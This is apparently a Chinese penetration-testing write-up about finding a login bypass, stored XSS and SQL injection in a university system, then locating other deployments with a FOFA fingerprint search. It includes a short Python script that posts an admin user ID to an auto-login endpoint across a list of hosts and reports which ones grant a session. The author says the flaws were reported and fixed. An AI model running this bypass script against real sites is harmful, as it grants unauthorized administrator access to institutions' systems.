一、漏洞挖掘
1、邏輯缺陷
熟悉的頁(yè)面,熟悉的弱口令測(cè)試,但無(wú)果

我就把目光轉(zhuǎn)向js審計(jì),果不其然有新發(fā)現(xiàn),可以根據(jù)賬號(hào)自動(dòng)登錄

于是直接構(gòu)造請(qǐng)求繞過(guò)登錄

經(jīng)典的管理員權(quán)限
2、存儲(chǔ)型XSS
尋找文本輸入

淺析:前端:這里的標(biāo)簽都是普通標(biāo)簽,沒(méi)有像RCDATA元素(RCDATA elements),有

所以就簡(jiǎn)單了,直接插入即可

3、SQL注入

測(cè)試無(wú)果

最后發(fā)現(xiàn)注入點(diǎn)在第一個(gè)函數(shù),果然任何一個(gè)輸入點(diǎn)都可能是不安全的,是布爾型盲注

后面就是經(jīng)典Sqlmap了

二、繼續(xù)通殺
根據(jù)系統(tǒng)指紋在fofa上搜索:"xx系統(tǒng)" && icon_hash="11xxxx"有32個(gè)IP,看了下,有重復(fù)的

使用fofa_viewer導(dǎo)出目標(biāo) 這里我根據(jù)第一個(gè)邏輯漏洞的漏洞指紋信息,寫(xiě)了一個(gè)簡(jiǎn)單poc
import requests
def poc(url):
poc_url = url + '/login/doautologin.edu'
data = {'um.userid': "admin"}
try:
res = requests.post(poc_url, data=data, timeout=5)
if (res.headers.get("Set-Cookie")): # 登錄成功就會(huì)set-cookie
print(url + '/login.html')
except BaseException:
pass
if __name__ == '__main__':
with open('url.txt', 'r') as f:
for i in f:
poc(i.rstrip('
'))
以上漏洞均已報(bào)告給相應(yīng)學(xué)校且已修復(fù)
三、思考總結(jié)
1)在訪(fǎng)問(wèn)系統(tǒng)當(dāng)中的時(shí)候F12查看源碼是一個(gè)不錯(cuò)的習(xí)慣(尤其是有前端彈框的)
2)前端代碼的一切展示行為完全可控(一定要理解這句話(huà))
3)了解程序的底層邏輯,你才能更清晰的知道每一個(gè)參數(shù)的意義
本文作者:B0ther
審核編輯:黃飛
-
SQL
+關(guān)注
關(guān)注
1文章
807瀏覽量
46964 -
安全漏洞
+關(guān)注
關(guān)注
0文章
152瀏覽量
17182 -
edu
+關(guān)注
關(guān)注
0文章
24瀏覽量
2031
原文標(biāo)題:記一次EDU網(wǎng)站漏洞通殺
文章出處:【微信號(hào):菜鳥(niǎo)學(xué)安全,微信公眾號(hào):菜鳥(niǎo)學(xué)安全】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。
發(fā)布評(píng)論請(qǐng)先 登錄
有人分享制作藍(lán)牙耳機(jī)的全過(guò)程嗎?
菜鳥(niǎo)制作51避障小車(chē)全過(guò)程記錄
CPU制造全過(guò)程
組裝電腦全過(guò)程視頻教程
DIY安裝導(dǎo)航+可視倒車(chē)+行車(chē)記錄+GPS跟蹤全過(guò)程
用C語(yǔ)言開(kāi)發(fā)DSP系統(tǒng)的全過(guò)程的講解
芯片制造全過(guò)程
用C語(yǔ)言開(kāi)發(fā)DSP系統(tǒng)全過(guò)程
用C語(yǔ)言開(kāi)發(fā)DSP系統(tǒng)的全過(guò)程講解
實(shí)戰(zhàn)記錄:EDU網(wǎng)站漏洞通殺全過(guò)程
評(píng)論